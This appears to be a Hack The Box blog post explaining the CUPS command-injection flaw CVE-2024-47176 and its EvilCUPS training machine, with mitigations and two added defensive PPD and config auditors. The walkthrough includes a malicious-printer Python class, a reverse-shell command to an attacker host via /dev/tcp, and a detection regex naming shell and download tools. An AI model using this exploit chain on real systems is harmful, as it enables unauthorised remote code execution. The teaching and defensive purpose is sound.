CVE Explained
HTB-Bot, Mar 05 2025
CVE-2024-47176 is a command injection vulnerability in CUPS (Common Unix Printing System) that allows unauthenticated remote attackers to install a malicious printer and execute arbitrary commands on a target system.
The flaw exists in Foomatic-RIP, a print processing filter, which fails to properly sanitize input, enabling attackers to inject commands into the print job pipeline.
This vulnerability impacts CUPS 2.4.2 and possibly earlier versions, making it a critical security concern for Linux-based systems that rely on CUPS for network printing.
Discovered by EvilSocket, CVE-2024-47176 is part of a set of four vulnerabilities in CUPS, which also include:
CVE-2024-47076 (libcupsfilters)
CVE-2024-47175 (libppd)
CVE-2024-47177 (Foomatic-RIP)
Let’s break down how this vulnerability works, how attackers exploit it, and how to mitigate it.
CUPS is a print server that allows users to manage and process print jobs. It typically listens on TCP port 631 for web-based management and UDP port 631 for automatic printer discovery.
The vulnerability in CUPS-browsed allows an attacker to send a malicious printer installation request over UDP. Once installed, the malicious printer is configured to inject commands via Foomatic-RIP, leading to remote code execution (RCE).
The attack chain follows these steps:
1. Send a printer installation request to the CUPS server via UDP/631.
2. The server auto-configures the printer based on attacker-supplied attributes.
3. Inject a malicious command via the FoomaticRIPCommandLine attribute.
4. Trigger command execution by printing a test page.
Get hands-on practice with EvilCUPS!
EvilCUPS is a Medium difficulty Linux machine that features a CUPS command injection vulnerability (CVE-2024-47176). This CVE allows remote unauthenticated users to install a malicious printer on the vulnerable machine over UDP/631.
This printer is configured to utilize [Foomatic-RIP]
The CUPS web server is configured to allow anonymous users access to TCP/631. Navigating here makes it possible to print a test page on the malicious printer and gain access as the "lp" user. This user has the ability to retrieve past print jobs, one of which contains the root password to the box.
Here’s how attackers exploit this vulnerability using a public proof-of-concept (PoC).
Using Nmap, attackers can identify a target running CUPS:
nmap -p- --min-rate=1000 -T4 <target-ip>
nmap -p631,22 -sC -sV <target-ip>
If TCP/631 (IPP) and UDP/631 (cups-browsed) are open, the system is vulnerable.
Attackers send a specially crafted IPP packet to trick CUPS into installing a fake printer. This is achieved using the ippserver library:
    class MaliciousPrinter(behaviour.StatelessPrinter):
        def __init__(self, command):
            self.command = command
            super().__init__()

        def printer_list_attributes(self):
            return {
                (SectionEnum.printer, b'printer-uri-supported', TagEnum.uri): [self.printer_uri],
                (SectionEnum.printer, b'printer-more-info', TagEnum.uri): [
                    f'"\n*FoomaticRIPCommandLine: "{self.command}"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'.encode()
                ]
            }
Step 3: Trigger remote code execution
Once the malicious printer is installed, attackers print a test page to trigger the execution:
python3 exploit.py <attacker-ip> <target-ip> "bash -c 'bash -i >& /dev/tcp/<attacker-ip>/9001 0>&1'"
Alternatively, this can be done manually by:
1. Navigating to http://<target-ip>:631.
2. Clicking Printers > Malicious Printer.
3. Selecting Print Test Page.
This executes the FoomaticRIPCommandLine payload, granting a reverse shell as the lp user.
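Defenders can look for the result of this injection in the PPD files CUPS keeps for its queues. The following is an added example, not part of the original post or the public PoC: it extracts every *FoomaticRIPCommandLine value from PPD text and flags shell or network tokens. The sample PPDs are constructed, the token list is an assumed heuristic, and on a live host the input would be the files under /etc/cups/ppd/.

```python
import html
import re

# Constructed sample: shape of a queue PPD after the injection described above.
INJECTED_PPD = '''*PPD-Adobe: "4.3"
*NickName: "Constructed sample printer"
*FoomaticRIPCommandLine: "sh -c 'touch /tmp/constructed-marker'"
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
'''

# Constructed sample: driver-style PPD whose value continues onto a second line.
BENIGN_PPD = '''*PPD-Adobe: "4.3"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dNOPAUSE -sDEVICE=pxlmono&&
 -sOutputFile=- -"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
'''

# Quoted PPD values may span lines, so match lazily up to the closing quote.
VALUE_RE = re.compile(r'^\*FoomaticRIPCommandLine\s*:\s*"(.*?)"', re.M | re.S)
# Assumed heuristic, tune per site: shells, downloaders, bash network
# redirection and command substitution. Some vendor PPDs may trip it.
RISKY_RE = re.compile(r"/dev/tcp/|`|\$\(|\b(?:sh|bash|dash|nc|ncat|curl|wget)\b")


def audit_ppd(ppd_text):
    """Return [(command_line, [risky tokens])] for suspicious directives."""
    findings = []
    for match in VALUE_RE.finditer(ppd_text):
        # Join "&&"-continued lines and undo &quot;/&apos; escaping first.
        command = re.sub(r"&&\s*\n\s*", " ", match.group(1))
        command = html.unescape(command).strip()
        tokens = sorted(set(RISKY_RE.findall(command)))
        if tokens:
            findings.append((command, tokens))
    return findings


if __name__ == "__main__":
    for name, text in (("injected", INJECTED_PPD), ("benign", BENIGN_PPD)):
        print(name, audit_ppd(text) or "clean")
```

A hit is a triage lead rather than proof of compromise; compare the flagged queue against the list of printers the host is expected to have.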
Once attackers gain initial access as lp, they can escalate privileges by retrieving past print jobs stored in /var/spool/cups/.
Since CUPS caches print jobs, attackers can access previously printed files, which may contain sensitive credentials such as the root password.
By analyzing cached jobs, they can extract credentials and escalate to root using:
su root
This completes the full attack chain, leading to complete system compromise.
The "Line Printer" user is not considered a privileged account; one of the few privileges it has beyond those of a standard user is the ability to read past print jobs.
That is not to say this isn't a critical exploit, as there may be other ways to escalate privileges, and this could be the initial foothold into the company's network. Even without administrative privileges, attackers can turn this box into a router and start accessing devices on the local network; oftentimes this leads to a complete compromise of the network.
To defend against this vulnerability, system administrators should:
Apply the latest security patches: Ensure CUPS is updated to the latest version.
Disable remote printer auto-discovery: Modify /etc/cups/cupsd.conf to restrict access:
<Location />
Order allow,deny
Deny from all
</Location>
Consider whether CUPS is required at all; if it is not, remove the service.
Restrict access to TCP/631 and UDP/631; use firewall rules to block unauthorized access.
sudo ufw deny 631/tcp
sudo ufw deny 631/udp
Monitor print job logs: Regularly check /var/spool/cups/ for suspicious activity.
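The <Location /> block above governs access to cupsd itself, while cups-browsed reads its own file, /etc/cups/cups-browsed.conf, where the BrowseRemoteProtocols directive decides whether legacy CUPS announcements on UDP/631 are accepted. The following added example (not from the original post) audits that file's contents. The sample configs are constructed, and the default used when the directive is absent, as well as the rule that a later directive overrides an earlier one, are assumptions.

```python
# Constructed samples of /etc/cups/cups-browsed.conf contents.
DEFAULT_CONF = "# BrowseRemoteProtocols dnssd cups\n"   # directive commented out
DNSSD_ONLY_CONF = "BrowseRemoteProtocols dnssd\n"
DISABLED_CONF = "BrowseRemoteProtocols dnssd cups\nBrowseRemoteProtocols none\n"

# Assumption: with no directive present, pre-fix builds default to "dnssd cups".
ASSUMED_DEFAULT = frozenset({"dnssd", "cups"})
# Directives that set the remote browse protocols (names compared in lower case).
DIRECTIVES = ("browseremoteprotocols", "browseprotocols")


def remote_protocols(conf_text, default=ASSUMED_DEFAULT):
    """Return the effective set of remote browse protocols for a config text."""
    effective = set(default)
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        parts = line.split()
        if parts[0].lower() in DIRECTIVES:
            # Assumption: a later directive overrides an earlier one.
            values = {v.lower() for v in parts[1:]}
            effective = values - {"none"}
    return effective


def accepts_legacy_udp_browsing(conf_text):
    """True when the legacy 'cups' protocol (UDP/631 announcements) is enabled."""
    return "cups" in remote_protocols(conf_text)


if __name__ == "__main__":
    samples = {"default": DEFAULT_CONF, "dnssd-only": DNSSD_ONLY_CONF,
               "disabled": DISABLED_CONF}
    for name, text in samples.items():
        print(f"{name}: legacy UDP browsing = {accepts_legacy_udp_browsing(text)}")
```

A host that reports True should have cups-browsed stopped and disabled, or the directive set to none.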
HTB releases new content every month that’s based on emerging threats and vulnerabilities. This allows teams to train on real-world, threat-landscape-connected scenarios in a safe and controlled environment.
In response to this vulnerability, we released EvilCUPS
Organizations like Toyota, NVISO, and RS2 are already using the platform to stay ahead of threats with hands-on skills and a platform for acquiring, retaining, and developing top cyber talent.